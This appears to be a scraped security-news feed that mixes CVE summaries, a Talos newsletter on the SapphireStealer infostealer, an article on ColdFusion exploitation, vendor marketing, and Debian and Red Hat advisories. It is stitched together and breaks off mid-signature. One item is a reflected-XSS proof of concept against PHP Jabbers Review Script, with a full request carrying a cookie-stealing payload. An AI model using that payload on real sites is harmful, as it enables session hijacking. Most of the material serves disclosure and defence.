Sensitive information disclosure due to excessive collection of system information. The following products are affected: Acronis Agent (Linux, macOS, Windows) before build 30991, Acronis Cyber Protect 15 (Linux, macOS, Windows) before build 35979.

CVE-2023-41745

A new open-source information stealer called ‘SapphireStealer’ has been observed across public malware repositories with increasing frequency. Plus, watch a new series of videos on the year so far in the threat landscape.

Thursday, August 31, 2023 14:08

Welcome to this week’s edition of the Threat Source newsletter.

I’m covering for Jon this week whilst he takes some well-deserved holiday. What’s on my mind this week? Well, apart from a new horror film that I just read about called “Slotherhouse” where the killer is, um, a sloth (I predict nothing but a masterpiece), there are a couple of things on my mind relating to open-source.

Firstly, on the bad actor side of things, we’re seeing more and more bad guys take advantage of the availability of tools that have been added to public malware sites, such as the infostealer “SaphireStealer” which you can read about below.

When I spoke to Cisco Talos’ Head of Outreach, Nick Biasini, about the biggest trends 2023 so far, he called out how attackers are increasingly using malicious open-source tooling. This has been a large part of the reason we are seeing a continuous fracturing of the ransomware and extortion landscape, as threat actors find what they need online, and then adapt these tools to suit their needs, and in many cases add on anti-detection mechanisms.

Speaking of 2023 trends, I just uploaded a new playlist of 1–2-minute long videos featuring Nick’s thoughts and explanations on some of the biggest threats we’ve seen so far this year - including the evolution of ransomware, the rise in commercial spyware, and supply chain attacks. Check out the playlist. As a preview, here's Nick talking about the evolution of ransomware in 2023:

On the flip side, open-source is of course one of the most important ways in which security defenders can learn, upskill, and share their findings with the community. That’s one of the reasons why Talos creates and releases open-source software, for free.

Just in case you don’t know about our open-source tools, which have been developed by some of the smartest brains on the planet, you should check them out. We have around 27 tools which are available to download on our website at talosintelligence.com/software and on GitHub. The latest and greatest of these is the NIM-IDA-FLIRT Generator tool.

Oh, I just read that “Slotherhouse” will not only feature a killer sloth, it’s called Alpha, and their weapon of choice is a samurai sword. One ticket please.

****The one big thing****

SapphireStealer, an open-source information stealer, has been increasingly observed across public malware repositories since its initial release in December 2022. SapphireStealer is an example of a new type of information stealer, which is mostly designed to facilitate the theft of various browser credential databases and files that may contain sensitive user information.

While infostealers have been around for a very long time, Talos has recently seen an increase in the emergence of new stealers being offered for sale or rent on various underground forums and marketplaces.

**Why do I care?**

As is often the case following the release of a new open-source malware codebase, threat actors have acted quickly, and began to experiment. Some threat actors have even extended SaphireStealer to support added functionality, and used other tooling to make the detection of SapphireStealer infections more difficult (again, another increasing trend that we’re seeing across the threat landscape). Infostealers remain a popular choice for financially motivated threat actors, as they provide a simple means to compromise and distribute sensitive information to adversaries.

**So now what?**

A comprehensive blog written by Edmund Brumaghin covers the background behind SapphireStealer, and our research on the tool, including a case study where we saw multiple failures on the part of the threat actor to maintain sound operational security. The blog includes Snort SIDs, and indicators of compromise.

****Top security headlines of the week****

*   **Operation “Duck Hunt" proactively removes Qakbot malware from 700,000 infected machines.** In one of the largest operations of its kind, federal law enforcement took decisive action against one of the most widely used and longstanding botnets. According to the U.S Department of Justice, these efforts resulted in Qakbot being “neutralized” from hundreds of thousands of devices. According to TechCrunch, “The Department of Justice also announced the seizure of more than $8.6 million in cryptocurrency from the Qakbot cybercriminal organization, which will now be made available to victims”. Dark Reading TechCrunch
*   **What’s in a name? Strange behaviors at top-level domains creates uncertainty in DNS.** When Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, it ignited a firestorm of controversy as security organizations warned against the confusion that was certain to occur. Talos researcher Jaeson Schultz recently wrote about the consequences of Google’s decsion, including how, in the worst case scenario, confusion over whether some name is a public DNS name, or another private resource can cause sensitive data to fall into the hands of unintended recipients. Talos blog.
*   **OpenAI rolls out a business edition of ChatGPT, promising “enterprise-grade security”**. OpenAI says it is making a commitment not to use client-specific prompts and data in the training of its models. SecurityWeek writes that “the security-centric features of the new ChatGPT Enterprise are meant to address ongoing business concerns about the protection of intellectual property and the integrity of sensitive corporate data when using LLM (large language model) algorithms.” SecurityWeek

****Can’t get enough Talos?****

*   Beers with Talos Ep. #138  “I’m going to breach you off.” “Not if I breach you off first!” (Where Barbie meets offensive security)
*   Talos Takes Ep. #152 Carrying out incident response in-person vs. virtually (hear about the positives and negatives of each approach)
*   Blog: Black Hat USA 2023 NOC: Network Assurance (a great write up about how Cisco and Talos helped to protect the network during Black Hat USA 2023).
*   Security Stories Ep. #69 Preparing for a cybersecurity incident, with Jeremy Maxwell (hear from a Cisco Talos Incident Response customer about how his organization proactively prepares for cybersecurity incidents within a highly regulated industry.

**Upcoming events where you can find Talos**

**LABScon** **(Sept. 20 - 23)**

Scottsdale, Arizona

_Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit._

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

_Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

_Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking._

****Most prevalent malware files from Talos telemetry over the past week****

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details

Typical Filename: c0dwjdi6a.dll

Claimed Product: N/A

Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

MD5: 2915b3f8b703eb744fc54c81f4a9c67f

VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/details

Typical Filename: VID001.exe

Claimed Product: N/A

Detection Name: Win.Worm.Coinminer::1201

SHA 256: 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6

MD5: 4c9a8e82a41a41323d941391767f63f7

VirusTotal: https://www.virustotal.com/gui/file/1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6/details

Typical Filename: !!Mreader.exe

Claimed Product: N/A

Detection Name: Win.Dropper.Generic::sheath

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details

Typical Filename: c0dwjdi6a.dll

Claimed Product: N/A

Detection Name: Trojan.GenericKD.33515991

SHA 256: 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b

MD5: f5e908f1fac5f98ec63e3ec355ef6279

VirusTotal: https://www.virustotal.com/gui/file/7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b/details

Typical Filename: IMG001.exe

Claimed Product: N/A

Detection Name: Win.Dropper.Coinminer::tpd

New open-source infostealer, and reflections on 2023 so far

By Habiba Rashid
The cybersecurity researchers at FortiGuard Labs have identified several Adobe ColdFusion vulnerabilities impacting Windows and Mac devices.
This is a post from HackRead.com Read the original post: Hackers Exploit Adobe ColdFusion Vulnerabilities to Deploy Malware

*   Remote attackers can exploit pre-authentication RCE vulnerabilities in Adobe ColdFusion 2021 to seize control of affected systems.

*   Adobe has released security patches to address these vulnerabilities, but attackers are still exploiting them.

*   The attack campaign involves multiple stages, including probing, reverse shells, and the deployment of malware.

*   Four distinct malware strains have been identified: XMRig Miner, Satan DDoS/Lucifer, RudeMiner, and BillGates/Setag backdoor.

*   Users are advised to upgrade their systems promptly and deploy protection mechanisms to thwart ongoing attacks.

Numerous users of both Windows and macOS platforms are currently at risk due to vulnerabilities present in Adobe ColdFusion. This software suite, a popular choice for web application development, recently came under attack as remote attackers discovered and exploited pre-authentication remote code execution (RCE) vulnerabilities. Such vulnerabilities granted attackers the ability to seize control of affected systems, raising the alarm to a critical severity level.

The crux of these attacks targets the WDDX deserialization process within Adobe ColdFusion 2021. While Adobe responded swiftly with security updates (APSB23-40, APSB23-41, and APSB23-47), FortiGuard Labs observed continued exploitation attempts. 

An analysis of the attack patterns uncovered a process executed by the threat actors. They initiated probing activities using tools like “interactsh” to test the exploit’s effectiveness. These activities were observed involving multiple domains including mooo-ngcom, redteamtf, and h4ck4funxyz. The probing phase provided attackers insights into potential vulnerabilities and served as a precursor to more malicious actions.

The attack campaign’s sophistication extended to the utilization of reverse shells. By encoding payloads in Base64, attackers sought to gain unauthorized access to victim systems, enabling remote control. 

Notably, the analysis disclosed a multi-pronged approach, including the deployment of various malware variants. Attacks were launched from distinct IP addresses, raising concerns about the campaign’s widespread reach. Malware payloads were encoded in Base64, concealing their true nature until decoded. Researchers identified four distinct malware strains at play: XMRig Miner, Satan DDoS/Lucifer, RudeMiner, and BillGates/Setag backdoor.

The XMRig Miner, primarily associated with Monero cryptocurrency mining, was harnessed to hijack system processing power. By utilizing version 6.20.0, attackers managed to capitalize on compromised systems for their own financial gain.

Attackers’ webpage (FortiGuard Labs)

A hybrid bot combining cryptojacking and distributed denial of service (DDoS) functionalities, Lucifer emerged as a formidable entity. This malware variant showcased not only its mining capabilities but also its adeptness in command and control operations, propagation through vulnerabilities, and sophisticated DDoS attacks.

RudeMiner, connected to Lucifer, carried a DDoS attack legacy from previous campaigns. Its involvement in the ongoing threat landscape demonstrated its persistence and adaptability, marking it as a significant concern.

The BillGates/Setag backdoor, previously associated with Confluence Server vulnerabilities, resurfaced in this context. Its multifaceted capabilities encompassed system hijacking, C2 communication, and diverse attack methods, including SYN, UDP, ICMP, and HTTP-based attacks.

Despite the availability of security patches, the continuous stream of attacks underscores the urgency of action. Users are strongly advised to upgrade their systems promptly and to deploy protection mechanisms including antivirus services, IPS signatures, web filtering, and IP reputation tracking, to thwart ongoing attacks.

1.  Adobe Reset User Passwords as Precaution Against Data Breach Risks
2.  Apple mistakenly approved malware camouflaged as Adobe Flash Player
3.  Fake Adobe updates installing cryptomining malware while updating Flash

Hackers Exploit Adobe ColdFusion Vulnerabilities to Deploy Malware

Local privilege escalation due to unrestricted loading of unsigned libraries. The following products are affected: Acronis Agent (macOS) before build 30600, Acronis Cyber Protect 15 (macOS) before build 35979.

CVE-2023-41744

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Schweitzer Engineering Laboratories SEL-5036 acSELerator Bay Screen Builder Software on Windows allows Relative Path Traversal.



SEL acSELerator Bay Screen Builder software is distributed by SEL-5033 SEL acSELerator RTAC, SEL-5030 Quickset, and SEL Compass. CVE-2023-31167 and was patched in the acSELerator Bay Screen Builder release available on 20230602. Please contact SEL for additional details.


This issue affects SEL-5036 acSELerator Bay Screen Builder Software: before 1.0.49152.778.



**Industrial Cybersecurity for OT Environments​**

The most effective OT cybersecurity platform, codifying threat intelligence and insights from the industry's largest team of ICS/OT practitioners.

Discover Why Dragos

**Visibility, Detection, and Response for OT Cyber Threats and Vulnerabilities**

The **Dragos Platform** gives you visibility into your ICS/OT assets, vulnerabilities, threats, and response actions, and supports you with forensics and OT-specific playbooks.

**In-Depth Asset Visibility**

The Dragos Platform analyzes multiple data sources including protocols, network traffic, data historians, host logs, asset characterizations, and anomalies to provide unmatched visibility of your ICS/OT environment.

**Unrivaled Threat Detection**

Based on the industry’s best threat intelligence, pinpoint malicious activity on your ICS/OT network, providing in-depth context for alerts, and reducing false positives for unparalleled threat detection.

Dragos Platform

OT Expertise Codified

**Comprehensive Vulnerability Management**

The only ICS/OT solution that provides corrected, prioritized guidance with full lifecycle vulnerability management, tracking historical disposition through automated collection & analysis.

**Investigation and Response**

Expert-authored playbooks to guide your security team step-by-step throughout investigations, decreasing response time and improving the efficiency of your team’s workflow.

**Your Path to Industrial Cybersecurity**

**Secure Your Digital Transformation**

Successfully transform your business and keep your operational technology (OT) environments secure.

**Industrial Cyber Risk Management**

Assess your industrial cyber risk and confidently respond to cyber incidents.

**Ensure ICS/OT Cybersecurity Compliance**

Create simplified, repeatable processes to meet audit and compliance requirements faster and more accurately.

**Solve Your Challenges**

**Start My Industrial Cybersecurity Program**

Are you ready to get your ICS/OT cybersecurity challenges under control? We are here to help you take the next step.

**Improve Visibility of My OT Assets**

You can’t protect what you can’t see. A successful OT security posture maintains an inventory of assets, maps vulnerabilities against those assets, and actively monitors traffic for potential threats.

**Defend Against Ransomware in OT**

OT networks can be directly impacted when ransomware cripples IT. Know what you can do to better protect against this increasing threat.

**Understand the Global Threat Landscape**

Dragos Worldview Threat Intelligence provides the proactive information you need to stay ahead of sophisticated industrial cybersecurity threats.

**Leverage MITRE ATT&CK for ICS**

See how defenders can operationalize MITRE ATT&CK for ICS with the Dragos Platform and Worldview Threat Intelligence.

**The Leader in Industrial Cybersecurity**

Dragos has unmatched experience securing industrial assets across vertical industries.

Chemical

Chemical

Protect the operational technology that helps run chemical production facilities and the valuable intellectual property regarding chemical formulas from a potential cyber attack.

Electric

Electric

Take a proactive, holistic approach to protect the full spectrum of operations and defend your critical electric infrastructure.

Food & Bev

Food & Bev

Benefit from in-depth visibility of assets and threats in your environment, along with playbooks to guide analysts step-by-step as they investigate potential incidents.

Manufacturing

Manufacturing

Analyze the entire spectrum of manufacturing production inputs from support systems, quality control systems, material handling technologies, and automation/control technologies.

Oil & Gas

Oil & Gas

Combine OT threat intelligence, professional services, and the most effective and efficient ICS cybersecurity technology to enhance visibility, detection, and response capabilities in oil and gas environments.

Pharmaceuticals

Pharmaceuticals

Analyze the entire OT spectrum—including systems for processing, quality control, enterprise resource planning, and other critical operations

Transportation

Transportation

Understand supply chain vulnerabilities, IT to OT convergence, and manage network asset inventory in order to systematically reduce cyber risk.

Water

Water

Protect community water & wastewater systems by preventing significant breaches with proactive defense.

**We Understand Industrial Adversaries Better Than Anyone — So You Can Too**

Our experts are the leading authorities in ICS/OT cybersecurity, with real-world experience with landmark attacks on OT networks.

Jodi Schatz

Chief Product Officer

Jon Lavender

Chief Technology Officer and Head of Product

Christophe Culine

President of Global Sales and Chief Revenue Officer

Ben Miller

Vice President Professional Services and R&D

Robert M. Lee

Chief Executive Officer

**What Dragos Customers Say**

“We are convinced that Dragos has significantly helped us increase our overall security posture – as well as our ability to provide the best service possible to our customers. We couldn’t ask for anything better.”

“The Dragos OT Watch team, enabled by Dragos Platform technology, provides a level of visibility into our assets and threats that we did not have the expertise nor the bandwidth to do on our own.”

Doug Short,

CIO & CISO Trinity River Authority of Texas

“Where Dragos differentiates from many \[competitors\] is in the ICS-focused expertise of its team, reflected in its intelligence-centric approach, where its deep and detailed knowledge of the specifics of the ICS threat landscape are born out of experience.”

**Working together with partners to protect you**

No matter where you are on your ICS/OT cybersecurity journey, we have the products and services you need. Let us help get you on the path to success.

CVE-2023-31167: Industrial Cybersecurity Technology for ICS/OT Asset Visibility | Dragos​

Debian Linux Security Advisory 5485-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5485-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 30, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2023-4573 CVE-2023-4574 CVE-2023-4575 CVE-2023-4581   
                 CVE-2023-4584

Multiple security issues have been found in the Mozilla Firefox  
web browser, which could potentially result in the execution  
of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 102.15.0esr-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 102.15.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTvgbMACgkQEMKTtsN8  
TjYyYQ/5AXRB+aU6RXtKeVkBOmIZpPzJPaSpdRNJ1YUK+V4yn9Pfsyowi+KWcGGw  
pp84zjhSlkc3ewNWvcMhyKyEB7wWRhnDE/VyxmdpxsS4CydkZc8RecLxU8B9Kddy  
qkvuXoYlFjE9fitqgU2eT0plrkJTImH6dbr6klmDqK+yQu3wl/penpMxxJEJgOWo  
oKiLe5asJJrtjVcUMrHs9CO2YspXcvlj4IBIqEfwz8FrVX0R+uMZrFARPbC6nHkv  
HJ/CUXSv3dIGEjl6opFjGDNKkBpO2ZwB9K3HBxmD320jLUgkRwKCCvyr1g+ZfcBt  
WwEwy/dE3fNJkLU5VlDdzY8O5CG4+OeP4QdICaSVqoVE1PfRX+trriAsWjENLm6o  
aWu1FLqMLvPiyRGz1d3QNeSMOvYG3czycGH5nEMWztBDFDJ+xWBZ57xUcT5xTIZb  
zWz+1ZL1rYaIrNPGC1nFcX5uHnnf7rzNjl0H18+FEudUwhzKUDdLxoMWqXJVtju2  
+YlY2OqKRQH8hrhVVuxv+L3oYF+jjQB/4hL1BrjB13K1Bqffeq5zSyKes7UfZ1AZ  
cSUVUsr3RKpCO7J+5lPOZqrThSBG3DWmmCBdl1AkZW4mv/g19EssM6zANYmZHzn8  
MyyqcIGdT0srUNECfrXzSFQ7ZhpTKAvCYt2wzrQhOsb7hxP4sa8=  
=s7Qw  
-----END PGP SIGNATURE-----

Debian Security Advisory 5485-1

Excessive attack surface due to binding to an unrestricted IP address. The following products are affected: Acronis Agent (Linux, macOS, Windows) before build 30430, Acronis Cyber Protect 15 (Linux, macOS, Windows) before build 35979.

CVE-2023-41742

PHP JABBERS PHP Review Script version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: PHPJABBERS-PHP Review Script-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 08/31/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/php-review-script/## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `action` request parameter is copied into the HTMLdocument as plain text between tags. The payload aelll<img src=aonerror=alert(1)>nx0ib was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal a PHPSESSID cookie!STATUS: HIGH Vulnerability[+]Exploit:```GETGET /1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionPostaelll%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3enx0ibHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.221094441.1693486538;_gid=GA1.2.1044601458.1693486538; _gat=1;_fbp=fb.1.1693486538348.177361623;_ga_NME5VTTGTT=GS1.2.1693486538.1.1.1693486541.57.0.0Upgrade-Insecure-Requests: 1Referer: http://demo.phpjabbers.com/1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionIndex&pjPage=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Review-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/phpjabbers-php-review-script-10-xss.html)## Time spend:01:05:00

PHP JABBERS PHP Review Script 1.0 Cross Site Scripting

Red Hat Security Advisory 2023-4731-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.10.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.13.10 security update  
Advisory ID:       RHSA-2023:4731-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4731  
Issue date:        2023-08-30  
CVE Names:         CVE-2022-27664 CVE-2022-41723 CVE-2023-3899   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.13.10 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.13.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.13.10. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:4734

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK  
decoding (CVE-2022-41723)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.13 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-12-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:28173b4b6efe4f67f8753566e5f3c9831e454609b7f1888e4b6687907f4b7f24

(For s390x architecture)  
The image digest is  
sha256:28173b4b6efe4f67f8753566e5f3c9831e454609b7f1888e4b6687907f4b7f24

(For ppc64le architecture)  
The image digest is  
sha256:a52cb6235e043468cef505e4ce554743fb562d0d3240baf06c65e13c44201168

(For aarch64 architecture)  
The image digest is  
sha256:4aab4b205723d83e1ac383ee312ba95405523b7a9791174cd003dd6ac4e10628

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-13075 - ice-gnss process used by PTP GM config is taking more than half CPU, sometimes almost a full CPU  
OCPBUGS-15897 - leap-seconds.list file included as part of linuxptp-daemon container expired on June 28, 2023  
OCPBUGS-16013 - Failed to install cluster with IPI baremetal with fips enable  
OCPBUGS-16640 - Images: update azure cli to 2.40.0+ in upi-installer to avoid security vulnerability  
OCPBUGS-16772 - [4.13] ensure fixes land for large inodes  
OCPBUGS-16777 - [4.13] Bootimage bump tracker  
OCPBUGS-16804 - [4.13] silence irrelevant "failed to lock file fileutil: file already locked" warnings  
OCPBUGS-17158 - [4.13] update packages in ironic containers  
OCPBUGS-17187 - Bump to kubernetes 1.26.7  
OCPBUGS-17365 - BMH is not reconciled on Secret change  
OCPBUGS-17453 - Not able to mirror OCI base image for example kubeturbo-certified's image   
OCPBUGS-17557 - [4.13] Improve error handling when provided with a faulty PerformanceProfile at install time  
OCPBUGS-17559 - [4.13] Missing Azure File CSI NFS support  
OCPBUGS-17728 - clusteroperator/network is degraded because DaemonSet /openshift-multus/dhcp-daemon rollout is not making progress - pod dhcp-daemon-* is in CrashLoopBackOff State  
OCPBUGS-17733 - Backported credential request breaks some upgrades to 4.13.9  
OCPBUGS-17769 - Agent-based install process the container machine-config-controller will be oom  
OCPBUGS-17791 - opm serve is inefficient in memory use  
OCPBUGS-17837 - [4.13] PROVISIONING_MACS unbound variable in ironic config  
OCPBUGS-17910 - [4.13] CI fails on "events should not repeat pathologically" because of missing node annotations

6. References:

https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2023-3899  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7+PuAAoJENzjgjWX9erEzwoP/0uIAS7ua3U7t1p6V3hg9Qkb  
B2VmfDTdE1X4T3nA1xkjocg8wI/GlH65ai46PpADoeqFH8DbLK1dUimfvXoERxJM  
lDfqQ2ARPOQBV7zhp757fmSThLpVCP/poaUswEZh3WC+PwMik2VT/f9/8QnI4tXU  
IqE7+RJByGPI5lNJbMRLKEXVUGhZdUSjZexflZYTeuLgffYJdMvnKa2PwaywDSqV  
m2vLl9c1GkokenvGryxJNQ2fqfEnVMUVTUzNsjzSfuVXGyGRrrKA/TchwQKHRwgB  
ICE4wIxBP2Wm+WIp52LG7AKHXmbuG5KwgBA3Vu343xpP/qa0BeEJqrN6MsKZY805  
DFzbyJS0nbE/ZE65KtrY2wKzD2dkY8ox6ed0k9q//fCx8ycXOjSIN9uzI1qq838c  
kjQZe3aIz18Gxf/QOoOWRyzgxZLiGbfcZ02ZcTodgPJ/5iJjakFMVJUBmDiCMs6D  
wRhW+LNm7nOXdCQE5Nj3s7+f4C47XLAYs3vDAdgSAltBASaRluusTQFXsbU3vh2E  
MoSI3t2NkE4fb7afy/dSpznO6HG+k4XlEXojACJooKVtskzey+mNOq4arTxasKw8  
XtkCWYPMxSA07DW5iNzeKxg8XokPuX4pRpwd9/Z3YX+JKhfMZaTitnbEI0ItCd/P  
sxxyWgcwD/Yh5NKNjQxQ  
=K0GL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4731-01

Red Hat Security Advisory 2023-4885-01 - Red Hat OpenShift support for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers. Issues addressed include a privilege escalation vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift support for Windows Containers 8.0.2 security update  
Advisory ID:       RHSA-2023:4885-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4885  
Issue date:        2023-08-30  
CVE Names:         CVE-2023-3676 CVE-2023-3955   
=====================================================================

1. Summary:

The components for Red Hat OpenShift support for Windows Containers 8.0.2  
are now available. This product release includes bug fixes and security  
updates for the following packages: windows-machine-config-operator and  
windows-machine-config-operator-bundle.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift support for Windows Containers allows you to deploy  
Windows container workloads running on Windows Server containers.

Security Fix(es):

* kubernetes: Insufficient input sanitization on Windows nodes leads to  
privilege escalation (CVE-2023-3676)

* kubernetes: Insufficient input sanitization on Windows nodes leads to  
privilege escalation (CVE-2023-3955)

For more details about the security issue(s), including the impact, CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For Windows Machine Config Operator upgrades, see the following  
documentation:  
https://docs.openshift.com/container-platform/latest/windows_containers/windows-node-upgrades.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2227126 - CVE-2023-3676 kubernetes: Insufficient input sanitization on Windows nodes leads to privilege escalation  
2227128 - CVE-2023-3955 kubernetes: Insufficient input sanitization on Windows nodes leads to privilege escalation

5. References:

https://access.redhat.com/security/cve/CVE-2023-3676  
https://access.redhat.com/security/cve/CVE-2023-3955  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7+KuAAoJENzjgjWX9erE3lMP/2jePX7S115czncgIpDraYAR  
x8aCx7Kyk6iIRDHIXYM3TOIRLDJHVX7/3oFxl4cCAd4/DskE5jchlrw3QWVC8qfp  
